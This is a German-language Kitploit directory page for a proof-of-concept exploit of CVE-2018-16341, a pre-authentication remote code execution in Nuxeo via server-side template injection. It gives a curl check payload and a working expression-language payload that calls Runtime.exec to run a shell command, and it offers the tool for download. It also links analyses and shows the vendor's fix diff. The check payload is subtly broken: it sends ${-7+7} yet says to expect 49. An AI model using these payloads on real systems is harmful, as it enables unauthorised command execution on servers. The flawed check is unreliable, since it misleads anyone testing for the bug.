Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-16341 — CVE-2018-16341 - Nuxeo Remote Code Execution ohne Authentifizierung mittels Server Side Template Injection | Kitploit
Tools/GitHubGitHub/mpgn/cve-2018-16341
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubmpgn/cve-2018-16341

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution ohne Authentifizierung mittels Server Side Template Injection

Repository anzeigen
24121vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-16341

Nuxeo Authentifizierungsumgehung Remote Code Execution < 10.3 mittels einer SSTI - CVE-2018-16341

image

Detaillierte Analyse (nicht englisch):

  • https://www.freebuf.com/vuls/193000.html
  • https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/

Sicherheitshinweis:

  • https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

Hinweis: Die Version von Nuxeo 9.x wird von Nuxeo nicht mehr unterstützt, aber es wurde ein Hotfix für die Version 9.x bereitgestellt. Meinerseits war die Version 9.10 verwundbar.


Die Schwachstelle

Dieser PoC nutzt eine Server Side Template Injection (SSTI) aus, um eine RCE zu erreichen, die sich in der Datei NuxeoUnknownResource.java befindet.

  • Um zu überprüfen, ob Nuxeo verwundbar ist, senden Sie einfach dieses Payload und prüfen Sie auf die Nummer 49:
root@kitploit:~
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
  • Erhalten Sie die RCE mit diesem Payload:
root@kitploit:~
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}

Behebung

root@kitploit:~
@@ -94,8 +92,13 @@ public void connect() throws IOException {
 
             @Override
             public InputStream getInputStream() throws IOException {
+                String message = "ERROR: facelet not found";
+                // NXP-25746
+                if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+                    message += " at '" + path + "'";
+                }
                 String msg = "<span><span style=\"color:red;font-weight:bold;\">"
-                        + StringEscapeUtils.escapeHtml4(errorMessage) + "</span><br/></span>";
+                        + StringEscapeUtils.escapeHtml4(message) + "</span><br/></span>";
                 return new ByteArrayInputStream(msg.getBytes());
             }
         }
Tool herunterladen